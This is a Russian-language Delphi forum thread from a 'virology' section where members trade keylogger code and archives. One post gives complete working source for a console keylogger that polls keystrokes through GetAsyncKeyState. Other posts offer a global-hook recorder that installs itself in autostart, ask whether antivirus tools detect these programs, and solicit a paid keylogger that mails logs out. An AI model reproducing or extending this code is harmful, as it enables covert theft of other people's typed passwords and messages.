Четверг, 29.10.2020, 08:53 Приветствую вас Гость | Группа "Гости" 
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 2
  • 1
  • 2
  • »
Модератор форума: Волк-1024, Anton93, xXxSh@dowxXx  
delfcode » Delphi » Вирусология Delphi » Пример кейлоггера (Пример кейлоггера)
Пример кейлоггера
gravitasДата: Воскресенье, 14.11.2010, 09:48 | Сообщение # 1
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Вобщем мне жалко смотреть, как умирает сайт Dolphin'a... Вот я и решил внести свой небольшой вклад в развитие сайта.
Принцип работы кейлоггера: кейлоггер каждые 125 мс проверяет, нажатие определенных клавиш (в исходнике они упомянуты почти все) и если какая либо нажата, то выводит в Memo1.Lines ее назывние. При желании можно добавить отправку на фтп или в асю. Написан увы на VCL, т.к. в WinAPI я пока еще не шарю. Вобщем - разбираем!
Пароль на архив - delfcode.ru
Прикрепления: primer_keylogg.rar(3.7 Kb)


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)


Сообщение отредактировал gravitas - Воскресенье, 14.11.2010, 09:52
 
gravitasДата: Воскресенье, 14.11.2010, 13:16 | Сообщение # 2
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Чет никто не отписывается... Это хорошо или плохо?))

TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)


Сообщение отредактировал gravitas - Воскресенье, 14.11.2010, 13:16
 
dolphinДата: Воскресенье, 14.11.2010, 16:37 | Сообщение # 3
Администратор
Сообщений: 906
Статус: Offline
Писал недавно на чистом апи http://delfcode.ru/blog/keyloger_bez_dll_vesom_1869_bajt/2010-08-30-6

OFFTOP Сайт не умирает, он замер пока нет времени на его развитие

Можно попробовать то что ты написал переписать в апишке, посмотрим что получится, странный кейлогер ))) пишет слова наоборот ))) biggrin biggrin


Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик


Сообщение отредактировал dolphin - Воскресенье, 14.11.2010, 18:29
 
gravitasДата: Воскресенье, 14.11.2010, 18:29 | Сообщение # 4
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Просто на VCL примеров кейлоггеров на сайте вообще нет почему то...

TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
gravitasДата: Воскресенье, 14.11.2010, 18:30 | Сообщение # 5
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
А это - (как никак) отличный пример между прочим!

TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
dolphinДата: Воскресенье, 14.11.2010, 18:35 | Сообщение # 6
Администратор
Сообщений: 906
Статус: Offline
Quote (gravitas)
Просто на VCL примеров кейлоггеров на сайте вообще нет почему то...

http://delfcode.ru/load/5-1-0-173

Quote (gravitas)
А это - (как никак) отличный пример между прочим!

Да, не плохой вариант, пока нигде не видел подобного


Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
 
gravitasДата: Воскресенье, 14.11.2010, 18:36 | Сообщение # 7
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Quote (dolphin)
http://delfcode.ru/load/5-1-0-173

Имеется ввиду без ДЛЛ'ок


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
gravitasДата: Воскресенье, 14.11.2010, 18:39 | Сообщение # 8
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Кстати сегодня написал тоже самое, только с получением хэндла окна (показывается, в каком окне был введен текст). Выложить?

TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
dolphinДата: Вторник, 16.11.2010, 10:57 | Сообщение # 9
Администратор
Сообщений: 906
Статус: Offline
Ок

Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
 
gravitasДата: Вторник, 16.11.2010, 15:59 | Сообщение # 10
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
20 мин одно и тоже копипастил в сорце smile Только попробуйте плохо оценить angry biggrin
Евгений, а сами то забываете про "+ в репутацию!" biggrin biggrin
Прикрепления: primer_keylogg_.rar(9.3 Kb)


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
C@TДата: Пятница, 19.11.2010, 01:23 | Сообщение # 11
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
вот пример прораммы, названной как кликер, писал давно и под заказ, так как проэкт был мелким и много не заплптили решил поделится smile
Суть программы запоминать события клавиатуры и мышки и воспроизводить их сохраняя интервал времини между событиями
Алгоритм работы юзер нажимает кнопку на форме прога запускает длл-ку которая ставит глобальные хуки на мышку и на клаву, длл=ка сохраняет все события в файл в виде кода который понимает программа, после того как программа запускает длл-ку она начинает слушать клавишу F9 и кода эта клавиша нажмется программа считает код который записала длл-ка в компонент класса ТМемо ,при нажатии кнопки старт кликинг программа выполнит код который висит в компоненте мемо причом код не обязан быть записанным длл-кой а может быть набран юзером

также программа может запомнить код при выключении и записыватся в автозагрузку и выполнить код автоматически после запуска

Прикрепления: Clicker_Source.zip(826.6 Kb)


 
XSPYДата: Пятница, 19.11.2010, 09:22 | Сообщение # 12
Продвинутый
Зарегистрирован: 28.01.2010
Группа: Пользователи
Сообщений: 263
Статус: Offline
А антивирусы не орут?

Я не крекер,а программист!
Я не преступник-я свободный человек!
Лучше один раз накодить,чем сто раз качать билды!
 
gravitasДата: Пятница, 19.11.2010, 13:42 | Сообщение # 13
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Quote (XSPY)
А антивирусы не орут?

Нет


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
artemukДата: Пятница, 07.01.2011, 00:53 | Сообщение # 14
Был не раз
Зарегистрирован: 31.05.2010
Группа: Пользователи
Сообщений: 17
Статус: Offline
gravitas
спс нигда такого кейлоггера не видел biggrin
 
icq_767388Дата: Пятница, 20.05.2011, 13:50 | Сообщение # 15
Группа: Удаленные



Народ нужен кейлогер с отправкой в аську или на мыло))) кто может помочь отпишитесь в icq (767388) в долгу не останусь)))
 
MyipsДата: Пятница, 20.05.2011, 15:40 | Сообщение # 16
Частый гость
Зарегистрирован: 13.05.2011
Группа: Пользователи
Сообщений: 26
Статус: Offline
gravitas, не мог бы ты привести пример получение хэндл окна и запись его в txt файл.
 
gravitasДата: Пятница, 20.05.2011, 15:51 | Сообщение # 17
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Myips, Получаешь текст хэндла с помощью функции из моего примера и записываешь его в файл с помощью WriteLn()

TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
MyipsДата: Пятница, 20.05.2011, 16:33 | Сообщение # 18
Частый гость
Зарегистрирован: 13.05.2011
Группа: Пользователи
Сообщений: 26
Статус: Offline
А можно как-нибудь без memo обойтись? Например что бы запись шла сразу в файл.
 
gravitasДата: Пятница, 20.05.2011, 16:46 | Сообщение # 19
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Quote (Myips)
А можно как-нибудь без memo обойтись? Например что бы запись шла сразу в файл.

Вместо присваивания значения переменной для логов вписывать в файл.
http://www.google.ru/#hl=ru&....ba7bab7


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
execomДата: Пятница, 01.07.2011, 11:25 | Сообщение # 20
Новичок
Зарегистрирован: 27.05.2010
Группа: Пользователи
Сообщений: 2
Статус: Offline
Скучная тема)) Кейлоггер должен работать с хуками, а тут сплошные попадалки-пальцем-в-небо)) А скорей промазывалки)) Ну разве может угроза весить 360кб???)) как в примере топикстартера)) Нормальный кейлоггер на апи будет весить кила 2-3 на делфи)
 
gravitasДата: Пятница, 01.07.2011, 11:38 | Сообщение # 21
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Товаришч, разве где то тут написано, что это сорсы мегопривата? Это всего лишь пример показывающий как проверить состояние клавиши...

TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
gravitasДата: Пятница, 01.07.2011, 12:13 | Сообщение # 22
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
А про хуки ты конечно выдал блин biggrin На, держи свое "на апи". За 10 минут сделал.
Code
{By Gravitas}
program APIKeylogg;
{$APPTYPE CONSOLE}
type
BOOL = LongBool;
WPARAM = Longint;
LPARAM = Longint;
SHORT = Smallint;
HWND = type LongWord;
UINT = LongWord;
TFNTimerProc = Pointer;
DWORD = LongWord;
TPoint = packed record
      X: Longint;
      Y: Longint;
end;
TMSG = packed record
      hwnd: HWND;
      message: UINT;
      wParam: WPARAM;
      lParam: LPARAM;
      time: DWORD;
      pt: TPoint;
end;

function GetAsyncKeyState(vKey: Integer): SHORT; stdcall; external 'user32.dll' name 'GetAsyncKeyState';
function SetTimer(hWnd: HWND; nIDEvent, uElapse: UINT; lpTimerFunc: TFNTimerProc): UINT; stdcall; external 'user32.dll' name 'SetTimer';
procedure Sleep(dwMilliseconds: DWORD); stdcall; external 'kernel32.dll' name 'Sleep';
function GetMessage(var lpMsg: TMsg; hWnd: HWND; wMsgFilterMin, wMsgFilterMax: UINT): BOOL; stdcall; external 'user32.dll' name 'GetMessageA';
function TranslateMessage(const lpMsg: TMsg): BOOL; stdcall; external 'user32.dll' name 'TranslateMessage';
function DispatchMessage(const lpMsg: TMsg): Longint; stdcall; external 'user32.dll' name 'DispatchMessageA';

procedure LoggingKey;
var
X:integer;
begin
for X:=65 to 90 do
      begin
      if GetAsyncKeyState(X)=-32767 then
        Write(Chr(X));
      end;
end;

var
mesg:tmsg;
begin
SetTimer(0, 0, 1, @LoggingKey);
While GetMessage(Mesg,0,0,0) do
     begin
      TranslateMessage(Mesg);
      DispatchMessage(Mesg);
     end;
end.


А вот вариант дельфина: http://delfcode.ru/blog/keyloger_bez_dll_vesom_1869_bajt/2010-08-30-6

P.S. http://tinyurl.com/69fswrs cool


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
alex0097Дата: Пятница, 01.07.2011, 23:28 | Сообщение # 23
Частый гость
Зарегистрирован: 11.07.2010
Группа: Пользователи
Сообщений: 51
Статус: Offline
gravitas а можешь сорц выложить полностью?
 
gravitasДата: Суббота, 02.07.2011, 01:01 | Сообщение # 24
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
alex0097, File - New - Other - Console Application. Копипастишь код туда и все.

TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
alex0097Дата: Суббота, 02.07.2011, 11:47 | Сообщение # 25
Частый гость
Зарегистрирован: 11.07.2010
Группа: Пользователи
Сообщений: 51
Статус: Offline
gravitas да но он русские символы не воспринимает, чет. Я вот первый раз сталкнулся с кейлогером. точнее заинтересовал он.

Сообщение отредактировал alex0097 - Суббота, 02.07.2011, 11:47
 
delfcode » Delphi » Вирусология Delphi » Пример кейлоггера (Пример кейлоггера)
  • Страница 1 из 2
  • 1
  • 2
  • »
Поиск:

delfcode.ru © 2008 - 2020 Хостинг от uCoz